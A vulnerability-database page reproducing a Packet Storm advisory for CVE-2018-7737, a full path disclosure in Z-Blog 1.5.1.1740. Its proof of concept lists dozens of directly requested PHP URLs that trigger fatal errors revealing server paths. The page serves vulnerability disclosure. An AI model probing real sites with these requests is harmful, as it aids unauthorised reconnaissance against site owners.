Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormZzwPACKETSTORM:147063
HistoryApr 05, 2018 - 12:00 a.m.

Z-Blog 1.5.1.1740 Full Path Disclosure

2018-04-0500:00:00
zzw
packetstormsecurity.com
15

0.006 Low

EPSS

Percentile

75.5%

JSON
`# Exploit Title: Z-Blog 1.5.1.1740 Web Site physical path leakage Vulnerability  
# Date: 2018-04-03  
# Exploit Author: zzw ([email protected])  
# Vendor Homepage: https://www.zblogcn.com/  
# Software Link: https://github.com/zblogcn/zblogphp  
# Version: 1.5.1.1740  
# CVE : CVE-2018-7737  
  
This is a WebSite physical path leakage vulnerability .  
  
poc (visit the following pages):  
  
http://localhost/z-blog//zb_system/admin/admin_footer.php  
http://localhost/z-blog//zb_system/admin/admin_header.php  
http://localhost/z-blog//zb_system/admin/admin_left.php  
http://localhost/z-blog//zb_system/admin/admin_top.php  
http://localhost/z-blog//zb_system/function/c_system_admin.php  
http://localhost/z-blog//zb_system/function/c_system_misc.php  
http://localhost/z-blog//zb_system/function/lib/category.php  
http://localhost/z-blog//zb_system/function/lib/comment.php  
http://localhost/z-blog//zb_system/function/lib/dbmysql.php  
http://localhost/z-blog//zb_system/function/lib/dbmysqli.php  
http://localhost/z-blog//zb_system/function/lib/dbpdo_mysql.php  
http://localhost/z-blog//zb_system/function/lib/dbpdo_pgsql.php  
http://localhost/z-blog//zb_system/function/lib/dbpdo_sqlite.php  
http://localhost/z-blog//zb_system/function/lib/dbpgsql.php  
http://localhost/z-blog//zb_system/function/lib/dbsqlite.php  
http://localhost/z-blog//zb_system/function/lib/dbsqlite3.php  
http://localhost/z-blog//zb_system/function/lib/member.php  
http://localhost/z-blog//zb_system/function/lib/module.php  
http://localhost/z-blog//zb_system/function/lib/networkcurl.php  
http://localhost/z-blog//zb_system/function/lib/networkfile_get_contents.php  
http://localhost/z-blog//zb_system/function/lib/networkfsockopen.php  
http://localhost/z-blog//zb_system/function/lib/post.php  
http://localhost/z-blog//zb_system/function/lib/sqlmysql.php  
http://localhost/z-blog//zb_system/function/lib/sqlpgsql.php  
http://localhost/z-blog//zb_system/function/lib/sqlsqlite.php  
http://localhost/z-blog//zb_system/function/lib/tag.php  
http://localhost/z-blog//zb_system/function/lib/upload.php  
http://localhost/z-blog//zb_users/cache/compiled/default/comment.php  
http://localhost/z-blog//zb_users/cache/compiled/default/comments.php  
http://localhost/z-blog//zb_users/cache/compiled/default/index.php  
http://localhost/z-blog//zb_users/cache/compiled/default/module-archives.php  
http://localhost/z-blog//zb_users/cache/compiled/default/module-authors.php  
http://localhost/z-blog//zb_users/cache/compiled/default/module-catalog.php  
http://localhost/z-blog//zb_users/cache/compiled/default/module-comments.php  
http://localhost/z-blog//zb_users/cache/compiled/default/module-previous.php  
http://localhost/z-blog//zb_users/cache/compiled/default/module-statistics.php  
http://localhost/z-blog//zb_users/cache/compiled/default/module-tags.php  
http://localhost/z-blog//zb_users/cache/compiled/default/post-multi.php  
http://localhost/z-blog//zb_users/cache/compiled/default/post-page.php  
http://localhost/z-blog//zb_users/cache/compiled/default/post-single.php  
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar.php  
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar2.php  
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar3.php  
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar4.php  
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar5.php  
http://localhost/z-blog//zb_users/cache/compiled/default/single.php  
http://localhost/z-blog//zb_users/plugin/AppCentre/include.php  
http://localhost/z-blog//zb_users/plugin/AppCentre/networkcurl.php  
http://localhost/z-blog//zb_users/plugin/AppCentre/networkfile_get_contents.php  
http://localhost/z-blog//zb_users/plugin/AppCentre/networkfsockopen.php  
http://localhost/z-blog//zb_users/plugin/STACentre/include.php  
http://localhost/z-blog//zb_users/plugin/Totoro/include.php  
http://localhost/z-blog//zb_users/plugin/UEditor/include.php  
http://localhost/z-blog//zb_users/plugin/UEditor/php/action_crawler.php  
http://localhost/z-blog//zb_users/plugin/UEditor/php/action_upload.php  
http://localhost/z-blog//zb_users/theme/default/include.php  
http://localhost/z-blog//zb_users/theme/metro/include.php  
http://localhost/z-blog//zb_users/theme/WhitePage/include.php  
  
the website will request like :   
  
Fatal error: Interface 'iDataBase' not found in C:\phpStudy\WWW\Z-Blog\zb_system\function\lib\dbsqlite3.php on line 8  
  
  
`

Related

prion 1
zdt 1
cve 1
exploitpack 1
exploitdb 1
prion
prion
Design/Logic Flaw
2018-03-06 21:29:00
zdt
zdt
Z-Blog 1.5.1.1740 - Full Path Disclosure Vulnerability
2018-04-05 00:00:00
cve
cve
CVE-2018-7737
2018-03-06 21:29:00
exploitpack
exploitpack
Z-Blog 1.5.1.1740 - Full Path Disclosure
2018-04-05 00:00:00
exploitdb
exploitdb
Z-Blog 1.5.1.1740 - Full Path Disclosure
2018-04-05 00:00:00

0.006 Low

EPSS

Percentile

75.5%

JSON
Related for PACKETSTORM:147063
prion1zdt1cve1exploitpack1exploitdb1